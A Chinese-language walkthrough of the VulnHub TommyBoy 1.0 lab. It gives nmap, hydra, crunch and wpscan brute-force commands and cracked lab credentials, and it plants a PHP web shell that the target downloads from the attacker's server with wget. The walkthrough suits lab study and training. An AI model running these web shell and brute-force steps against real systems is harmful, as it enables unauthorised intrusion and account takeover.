vulnhub-TommyBoy1dot0
知识点
信息收集*
火狐插件修改user-agent为iphone
提权(更换低权限用户组)
Description
=================
圣施耐克!汤米男孩需要您的帮助!
Callahan Auto公司终于进入了现代技术领域,并建立了一个Web服务器供其客户用于订购刹车片。
不幸的是,该网站刚刚瘫痪,唯一拥有管理员凭据的人是Tom Callahan Sr.-刚刚去世!更糟糕的是,唯一一个了解服务器的人退出了!
您需要帮助Tom Jr.,Richard和Michelle再次恢复该网页。否则,卡拉汉汽车公司肯定会倒闭:-(
Objective
=================
主要目的是将主页的备份副本还原到Callahan Auto的服务器。但是,要考虑将箱子完全塞满,您将需要收集散布在系统上的5个标志,并使用其中的数据来解锁一条最终消息。
环境搭建
下载ova文件,导入虚拟机即可
下载地址:https://www.vulnhub.com/entry/tommy-boy-1,157/
———————-
信息收集
主机发现
1 | nmap -sP 192.168.211.1/24 |
靶机ip为192.168.211.159
端口扫描
1 | nmap -A 192.168.211.159 -p 1-65535 |
开放了22、80、8008三个端口
访问一下80端口
目录扫描
flag1
发现robots.txt,里面发现第一个flag的目录
之后返回首页查看网页源码,发现一个视频地址
看wp居然prehistoricforest/是个目录,长见识了
访问prehistoricforest,是一个博客系统
flag2
在最后一个posts中发现flag2
之后在另一篇博客中发现了一个目录
访问可以发现一张图片,下载下来使用编辑器查看可以发现一串md5
ce154b5a8e59c89732bc25d6a2e6b90b
解码的到spanky
这是一篇加密文章的密码,访问该加密文章
在文章中发现nickburns用户
根据说明,靶机开放了一个ftp端口,但是每隔15分钟都会关闭,通过nmap扫描得到ftp端口为65534
使用hydra爆破一下
1 | hydra ftp://192.168.211.160:65534 -l nickburns -e ns |
得到用户名和密码一样
使用ftp登陆,发现一个readme.txt文件,将其下到本地查看
提示将一个压缩包放到了NickIzL33t目录,但是访问却什么都没有发现,这是想起还有一个8008端口,访问
显示Steve Jobs可以查看内容,这是需要安装user-agent插件
访问成功,但是显示存在一个html隐藏文件,需要找到他
这里可以通过爆破来寻找该html文件,使用dirbuster工具
在这之前要设置user-agent为iphone
得到/fallon1.html,访问一下,发现第三个flag
flag3
还有一个hint
英语不好~~
再将第三个提示下载下来,是一个加密的压缩包,根据第一个提示进行爆破
1
2
3
4
5 * One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters
使用crunch工具生成字典
-t 命令如下:
-t @,%^,指定模式,@,%^分别代表意义如下:
@ 插入小写字母
, 插入大写字母
% 插入数字
^ 插入特殊符号
1 | crunch 13 13 -t bev,%%@@^1995 -o zippass.txt |
之后使用工具爆破
密码为bevH00tr$1995
,打开压缩包
1 | Sandusky Banking Site |
提示密码fatguyinalittlecoat
后面还有一些数字
之后扫描一下网站,发现为wordpress网站
使用wpscan进行利用
1 | wpscan --url http://192.168.211.160/prehistoricforest/ -e u |
根据压缩文件里面的信息,应该是要登陆tom这个用户,使用wpscan进行爆破
1 | wpscan --url http://192.168.211.160/prehistoricforest -P /usr/share/wordlists/rockyou.txt -U tom |
爆破得到密码为tomtom1
之后登陆后台,在posts里面发现密码后半部分
Username: bigtommysenior
Password: fatguyinalittlecoat1938!!
getshell
使用ssh连接之后getshell
1 | ssh 192.168.211.160 -u bigtommysenior |
flag4
登陆之后发现flag4
还有一个备份文件,将备份文件cp到index,html 里面
1 | cp callahanbak.bak /var/www/html/index.html |
网站能成功访问
之后便是提权
提权
根据flag4里面的提示,我们需要读取5.txt里面的内容,在根目录下发现了.5.txt文件,但是由于属于www-data用户组,所以并没有权限读取
之后发现/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads
目录,可以进行文件上传,里面后一个.htaccess文件,可以将gif文件当做PHP来执行
但是上传一个一句话木马并不能连接,所以尝试直接写入一句话
可以其将$_GET,$_POST
和一些函数过滤了
这时可以考虑从攻击机上下载文件到该目录
开启一个http端口
python -m SimpleHTTPServer 8080写一个一句话文件
<?php system($_GET[a]);?>
#这里使用eval($_GET[a])
没有成功之后将其下载保存即可
1 >wget http://192.168.211.151:8080/shell.php -O shell.php
访问为www-data 用户组,可以读取.5.txt文件
flag5
最后将5个flag拼接便是压缩包LOOT.zip的密码B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
这一个靶机主要考察的就是信息收集,信息收集还是很重要的。做个靶机还有剧情,也是非常有趣的!